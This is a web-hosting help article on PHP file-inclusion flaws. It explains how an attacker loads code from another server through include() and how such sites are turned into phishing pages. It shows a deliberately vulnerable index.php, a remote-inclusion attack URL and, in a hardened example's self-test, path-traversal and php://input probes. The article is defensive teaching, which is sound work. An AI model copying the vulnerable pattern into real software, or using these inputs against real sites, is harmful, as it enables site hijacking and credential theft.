This article explains one of the most common security problems on websites built with PHP: unsafe use of the include() function (PHP file inclusion). Passing unsanitised input to include() on your Loopia web hosting can allow an attacker to load PHP code from another server and hijack your site.
How the attack works
Attackers commonly probe a website's GET parameters to find such weaknesses, which are often related to how the site uses the include() function.
Once a weakness is found, it is exploited by sending specially crafted GET parameters that fool the website into loading, and executing, PHP pages from other servers.
A PHP page loaded from another server could contain anything. It may, for example, be a page that lets the attacker upload arbitrary files to any directory on the website, or a phishing page that steals login details.
From hijacked site to phishing campaign
The attacker then sends a mass mailing to many addresses, sets the sender to look like the official website of the target, and includes a link to the hijacked home page, often with a message claiming that you need to log in to update your contact details or similar.
Because the page you arrive at when you click the link looks like the website's normal login page, many people are fooled into logging in. They believe they need to change their password or update their details, as the email instructed them to do.
The fake login page saves the credentials and emails them to an address controlled by the attacker, who now holds many genuine logins for the website and could use them, for example, to empty bank accounts.
An example of the PHP include problem
If you have a website at http://www.example.com with a page called index.php with the following contents:
<html>
<body>
<?php include($_GET['page'].".php"); ?>
</body>
</html>
A visitor could now request http://www.example.com/index.php?page=http://www.dangerous-site.com/exploit.txt.
Suppose there is PHP code at http://www.dangerous-site.com/exploit.txt.php, for example the code for a file upload page. When the URL above is requested, include() appends ".php" to the page parameter, fetches that code from www.dangerous-site.com and executes it on www.example.com. Remote inclusion like this requires the php.ini setting allow_url_include to be On (it has been Off by default since PHP 5.2), but even with it Off the same code still lets an attacker include files that already exist on the server, such as previously uploaded files, by supplying a path instead of a URL.
The visitor would now be able to upload files to www.example.com through that upload page. Of course it does not have to be an upload page; it could just as well be code that replaces index.php, removes or changes something on the website, or installs a phishing page.
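The following is an added example of how index.php above can be written safely; it is not code from the original article or from Loopia. The page parameter is used only as a key into a fixed allow-list of page names, so neither a URL nor a file path from the request ever reaches include(); the realpath() check is defence in depth on top of that. The page names, file names and the pages/ directory are assumptions for the example. Run from the command line, the script creates a temporary pages directory and tries the article's payload and a few other requests against it.

```php
<?php
// Hardened version of the vulnerable index.php from the article.
// Added example, not Loopia's code. The page names, file names and the
// pages/ directory are assumptions for the example.
declare(strict_types=1);

// Allow-list: the only pages the site can show, each mapped to a file
// under the pages directory. The request never supplies a file name.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Return the absolute path of the file to include for $requested, or null
 * if it is not an allow-listed page name. A URL such as
 * http://www.dangerous-site.com/exploit.txt or a path such as ../../etc/passwd
 * is simply not a key in PAGES and is rejected before the filesystem is touched.
 */
function resolve_page(string $requested, string $pagesDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: refuse anything that resolves outside the pages
    // directory (for example a stray symlink), even though PAGES is trusted.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Self-check when run from the command line: build a temporary pages
    // directory and try some requests against it, including the article's payload.
    $tmp = sys_get_temp_dir() . '/include-demo-' . getmypid();
    mkdir($tmp . '/pages', 0700, true);
    foreach (PAGES as $file) {
        file_put_contents("$tmp/pages/$file", "<?php echo 'real page';\n");
    }
    $probes = [
        'home',                                        // legitimate request
        'http://www.dangerous-site.com/exploit.txt',   // remote inclusion, as in the article
        '../../../../etc/passwd',                      // local inclusion / path traversal
        'php://input',                                 // stream wrapper instead of a file
    ];
    foreach ($probes as $p) {
        $file = resolve_page($p, "$tmp/pages");
        printf("%-45s => %s\n", $p, $file === null ? 'rejected' : 'include ' . basename($file));
    }
    foreach (PAGES as $file) {
        unlink("$tmp/pages/$file");
    }
    rmdir("$tmp/pages");
    rmdir($tmp);
    exit(0);
}

// Web request: default to 'home', answer 404 for anything not allow-listed.
$file = resolve_page((string)($_GET['page'] ?? 'home'), __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    echo 'Page not found';
    exit;
}
?>
<html>
<body>
<?php include $file; ?>
</body>
</html>
```

Only the first probe resolves to a file; the other three are rejected without any string manipulation, because they are not keys in the allow-list. Independently of the code, keep allow_url_include = Off in php.ini (the default since PHP 5.2) and verify it on shared hosting with ini_get('allow_url_include') or phpinfo(), since that setting alone decides whether include() will fetch from another server at all.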